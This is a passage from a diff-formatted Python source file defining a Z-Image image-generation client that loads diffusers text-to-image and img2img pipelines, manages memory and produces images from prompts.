dtype: torch.dtype = torch.bfloat16,
|
| 75 |
+
enable_cpu_offload: bool = True,
|
| 76 |
+
):
|
| 77 |
+
"""
|
| 78 |
+
Initialize Z-Image client.
|
| 79 |
+
|
| 80 |
+
Args:
|
| 81 |
+
model_variant: Model variant to use:
|
| 82 |
+
- "turbo": Fast, 9 steps, 16GB VRAM (RECOMMENDED)
|
| 83 |
+
- "base": Quality-focused, 50 steps
|
| 84 |
+
- "edit": Instruction-following image editing
|
| 85 |
+
- "omni": Versatile generation + editing
|
| 86 |
+
device: Device to use (cuda or cpu)
|
| 87 |
+
dtype: Data type for model weights (bfloat16 recommended)
|
| 88 |
+
enable_cpu_offload: Enable CPU offload to save VRAM
|
| 89 |
+
"""
|
| 90 |
+
self.model_variant = model_variant
|
| 91 |
+
self.device = device
|
| 92 |
+
self.dtype = dtype
|
| 93 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 94 |
+
self.pipe = None
|
| 95 |
+
self.pipe_img2img = None
|
| 96 |
+
self._loaded = False
|
| 97 |
+
|
| 98 |
+
# Get default settings for this variant
|
| 99 |
+
defaults = self.MODEL_DEFAULTS.get(model_variant, {"steps": 9, "guidance": 0.0})
|
| 100 |
+
self.default_steps = defaults["steps"]
|
| 101 |
+
self.default_guidance = defaults["guidance"]
|
| 102 |
+
|
| 103 |
+
logger.info(f"ZImageClient initialized (variant: {model_variant}, steps: {self.default_steps}, guidance: {self.default_guidance})")
|
| 104 |
+
|
| 105 |
+
def load_model(self) -> bool:
|
| 106 |
+
"""Load the model into memory."""
|
| 107 |
+
if self._loaded:
|
| 108 |
+
return True
|
| 109 |
+
|
| 110 |
+
try:
|
| 111 |
+
# Get model ID for selected variant
|
| 112 |
+
model_id = self.MODELS.get(self.model_variant, self.MODELS["turbo"])
|
| 113 |
+
logger.info(f"Loading Z-Image ({self.model_variant}) from {model_id}...")
|
| 114 |
+
|
| 115 |
+
start_time = time.time()
|
| 116 |
+
|
| 117 |
+
# Import diffusers pipelines for Z-Image
|
| 118 |
+
# Requires latest diffusers: pip install git+https://github.com/huggingface/diffusers
|
| 119 |
+
from diffusers import ZImagePipeline, ZImageImg2ImgPipeline
|
| 120 |
+
|
| 121 |
+
# Load text-to-image pipeline
|
| 122 |
+
self.pipe = ZImagePipeline.from_pretrained(
|
| 123 |
+
model_id,
|
| 124 |
+
torch_dtype=self.dtype,
|
| 125 |
+
)
|
| 126 |
+
|
| 127 |
+
# Load img2img pipeline (shares components)
|
| 128 |
+
self.pipe_img2img = ZImageImg2ImgPipeline.from_pretrained(
|
| 129 |
+
model_id,
|
| 130 |
+
torch_dtype=self.dtype,
|
| 131 |
+
# Share components to save memory
|
| 132 |
+
text_encoder=self.pipe.text_encoder,
|
| 133 |
+
tokenizer=self.pipe.tokenizer,
|
| 134 |
+
vae=self.pipe.vae,
|
| 135 |
+
transformer=self.pipe.transformer,
|
| 136 |
+
scheduler=self.pipe.scheduler,
|
| 137 |
+
)
|
| 138 |
+
|
| 139 |
+
# Apply memory optimization
|
| 140 |
+
if self.enable_cpu_offload:
|
| 141 |
+
self.pipe.enable_model_cpu_offload()
|
| 142 |
+
self.pipe_img2img.enable_model_cpu_offload()
|
| 143 |
+
logger.info("CPU offload enabled")
|
| 144 |
+
else:
|
| 145 |
+
self.pipe.to(self.device)
|
| 146 |
+
self.pipe_img2img.to(self.device)
|
| 147 |
+
logger.info(f"Model moved to {self.device}")
|
| 148 |
+
|
| 149 |
+
# Optional: Enable flash attention if available
|
| 150 |
+
try:
|
| 151 |
+
self.pipe.transformer.set_attention_backend("flash")
|
| 152 |
+
self.pipe_img2img.transformer.set_attention_backend("flash")
|
| 153 |
+
logger.info("Flash Attention enabled")
|
| 154 |
+
except Exception:
|
| 155 |
+
logger.info("Flash Attention not available, using default SDPA")
|
| 156 |
+
|
| 157 |
+
load_time = time.time() - start_time
|
| 158 |
+
logger.info(f"Z-Image ({self.model_variant}) loaded in {load_time:.1f}s")
|
| 159 |
+
|
| 160 |
+
# Validate by running a test generation
|
| 161 |
+
logger.info("Validating model with test generation...")
|
| 162 |
+
try:
|
| 163 |
+
test_result = self.pipe(
|
| 164 |
+
prompt="A simple test image",
|
| 165 |
+
height=256,
|
| 166 |
+
width=256,
|
| 167 |
+
guidance_scale=0.0,
|
| 168 |
+
num_inference_steps=2,
|
| 169 |
+
generator=torch.Generator(device="cpu").manual_seed(42),
|
| 170 |
+
)
|
| 171 |
+
if test_result.images[0] is not None:
|
| 172 |
+
logger.info("Model validation successful")
|
| 173 |
+
else:
|
| 174 |
+
logger.error("Model validation failed: no output image")
|
| 175 |
+
return False
|
| 176 |
+
except Exception as e:
|
| 177 |
+
logger.error(f"Model validation failed: {e}", exc_info=True)
|
| 178 |
+
return False
|
| 179 |
+
|
| 180 |
+
self._loaded = True
|
| 181 |
+
return True
|
| 182 |
+
|
| 183 |
+
except Exception as e:
|
| 184 |
+
logger.error(f"Failed to load Z-Image: {e}", exc_info=True)
|
| 185 |
+
return False
|
| 186 |
+
|
| 187 |
+
def unload_model(self):
|
| 188 |
+
"""Unload model from memory."""
|
| 189 |
+
if self.pipe is not None:
|
| 190 |
+
del self.pipe
|
| 191 |
+
self.pipe = None
|
| 192 |
+
if self.pipe_img2img is not None:
|
| 193 |
+
del self.pipe_img2img
|
| 194 |
+
self.pipe_img2img = None
|
| 195 |
+
|
| 196 |
+
self._loaded = False
|
| 197 |
+
|
| 198 |
+
if torch.cuda.is_available():
|
| 199 |
+
torch.cuda.empty_cache()
|
| 200 |
+
|
| 201 |
+
logger.info("Z-Image unloaded")
|
| 202 |
+
|
| 203 |
+
def generate(
|
| 204 |
+
self,
|
| 205 |
+
request: GenerationRequest,
|
| 206 |
+
num_inference_steps: int = None,
|
| 207 |
+
guidance_scale: float = None
|
| 208 |
+
) -> GenerationResult:
|
| 209 |
+
"""
|
| 210 |
+
Generate image using Z-Image.
|
| 211 |
+
|
| 212 |
+
Args:
|
| 213 |
+
request: GenerationRequest object
|
| 214 |
+
num_inference_steps: Number of denoising steps (9 for turbo)
|
| 215 |
+
guidance_scale: Classifier-free guidance scale (0.0 for turbo)
|
| 216 |
+
|
| 217 |
+
Returns:
|
| 218 |
+
GenerationResult object
|
| 219 |
+
"""
|
| 220 |
+
if not self._loaded:
|
| 221 |
+
if not self.load_model():
|
| 222 |
+
return GenerationResult.error_result("Failed to load Z-Image model")
|
| 223 |
+
|
| 224 |
+
# Use model defaults if not specified
|
| 225 |
+
if num_inference_steps is None:
|
| 226 |
+
num_inference_steps = self.default_steps
|
| 227 |
+
if guidance_scale is None:
|
| 228 |
+
guidance_scale = self.default_guidance
|
| 229 |
+
|
| 230 |
+
try:
|
| 231 |
+
start_time = time.time()
|
| 232 |
+
|
| 233 |
+
# Get dimensions from aspect ratio
|
| 234 |
+
width, height = self._get_dimensions(request.aspect_ratio)
|
| 235 |
+
|
| 236 |
+
logger.info(f"Generating with Z-Image {self.model_variant}: steps={num_inference_steps}, guidance={guidance_scale}")
|
| 237 |
+
|
| 238 |
+
# Check if we have input images (use img2img pipeline)
|
| 239 |
+
if request.has_input_images:
|
| 240 |
+
return self._generate_img2img(
|
| 241 |
+
request, width, height, num_inference_steps, guidance_scale, start_time
|
| 242 |
+
)
|
| 243 |
+
|
| 244 |
+
# Text-to-image generation
|
| 245 |
+
gen_kwargs = {
|
| 246 |
+
"prompt": request.prompt,
|
| 247 |
+
"height": height,
|
| 248 |
+
"width": width,
|
| 249 |
+
"guidance_scale": guidance_scale,
|
| 250 |
+
"num_inference_steps": num_inference_steps,
|
| 251 |
+
"generator": torch.Generator(device="cpu").manual_seed(42),
|
| 252 |
+
}
|
| 253 |
+
|
| 254 |
+
# Add negative prompt if present
|
| 255 |
+
if request.negative_prompt:
|
| 256 |
+
gen_kwargs["negative_prompt"] = request.negative_prompt
|
| 257 |
+
|
| 258 |
+
logger.info(f"Generating with Z-Image: {request.prompt[:80]}...")
|
| 259 |
+
|
| 260 |
+
# Generate
|
| 261 |
+
with torch.inference_mode():
|
| 262 |
+
output = self.pipe(**gen_kwargs)
|
| 263 |
+
image = output.images[0]
|
| 264 |
+
|
| 265 |
+
generation_time = time.time() - start_time
|
| 266 |
+
logger.info(f"Generated in {generation_time:.2f}s: {image.size}")
|
| 267 |
+
|
| 268 |
+
return GenerationResult.success_result(
|
| 269 |
+
image=image,
|
| 270 |
+
message=f"Generated with Z-Image ({self.model_variant}) in {generation_time:.2f}s",
|
| 271 |
+
generation_time=generation_time
|
| 272 |
+
)
|
| 273 |
+
|
| 274 |
+
except Exception as e:
|
| 275 |
+
logger.error(f"Z-Image generation failed: {e}", exc_info=True)
|
| 276 |
+
return GenerationResult.error_result(f"Z-Image error: {str(e)}")
|
| 277 |
+
|
| 278 |
+
def _generate_img2img(
|
| 279 |
+
self,
|
| 280 |
+
request: GenerationRequest,
|
| 281 |
+
width: int,
|
| 282 |
+
height: int,
|
| 283 |
+
num_inference_steps: int,
|
| 284 |
+
guidance_scale: float,
|
| 285 |
+
start_time: float
|
| 286 |
+
) -> GenerationResult:
|
| 287 |
+
"""Generate using img2img pipeline with input images."""
|
| 288 |
+
try:
|
| 289 |
+
# Get the first valid input image
|
| 290 |
+
input_image = None
|
| 291 |
+
for img in request.input_images:
|
| 292 |
+
if img is not None:
|
| 293 |
+
input_image = img
|
| 294 |
+
break
|
| 295 |
+
|
| 296 |
+
if input_image is None:
|
| 297 |
+
return GenerationResult.error_result("No valid input image provided")
|
| 298 |
+
|
| 299 |
+
# Resize input image to target dimensions
|
| 300 |
+
input_image = input_image.resize((width, height), Image.Resampling.LANCZOS)
|
| 301 |
+
|
| 302 |
+
# Build generation kwargs for img2img
|
| 303 |
+
gen_kwargs = {
|
| 304 |
+
"prompt": request.prompt,
|
| 305 |
+
"image": input_image,
|
| 306 |
+
"strength": 0.6, # How much to transform the image
|
| 307 |
+
"height": height,
|
| 308 |
+
"width": width,
|
| 309 |
+
"guidance_scale": guidance_scale,
|
| 310 |
+
"num_inference_steps": num_inference_steps,
|
| 311 |
+
"generator": torch.Generator(device="cpu").manual_seed(42),
|
| 312 |
+
}
|
| 313 |
+
|
| 314 |
+
# Add negative prompt if present
|
| 315 |
+
if request.negative_prompt:
|
| 316 |
+
gen_kwargs["negative_prompt"] = request.negative_prompt
|
| 317 |
+
|
| 318 |
+
logger.info(f"Generating img2img with Z-Image: {request.prompt[:80]}...")
|
| 319 |
+
|
| 320 |
+
# Generate
|
| 321 |
+
with torch.inference_mode():
|
| 322 |
+
output = self.pipe_img2img(**gen_kwargs)
|
| 323 |
+
image = output.images[0]
|
| 324 |
+
|
| 325 |
+
generation_time = time.time() - start_time
|
| 326 |
+
logger.info(f"Generated img2img in {generation_time:.2f}s: {image.size}")
|
| 327 |
+
|
| 328 |
+
return GenerationResult.success_result(
|
| 329 |
+
image=image,
|
| 330 |
+
message=f"Generated with Z-Image img2img ({self.model_variant}) in {generation_time:.2f}s",
|
| 331 |
+
generation_time=generation_time
|
| 332 |
+
)
|
| 333 |
+
|
| 334 |
+
except Exception as e:
|
| 335 |
+
logger.error(f"Z-Image img2img generation failed: {e}", exc_info=True)
|
| 336 |
+
return GenerationResult.error_result(f"Z-Image img2img error: {str(e)}")
|
| 337 |
+
|
| 338 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 339 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 340 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 341 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 342 |
+
|
| 343 |
+
def is_healthy(self) -> bool:
|
| 344 |
+
"""Check if model is loaded and ready."""
|
| 345 |
+
return self._loaded and self.pipe is not None
|
| 346 |
+
|
| 347 |
+
@classmethod
|
| 348 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 349 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 350 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 351 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|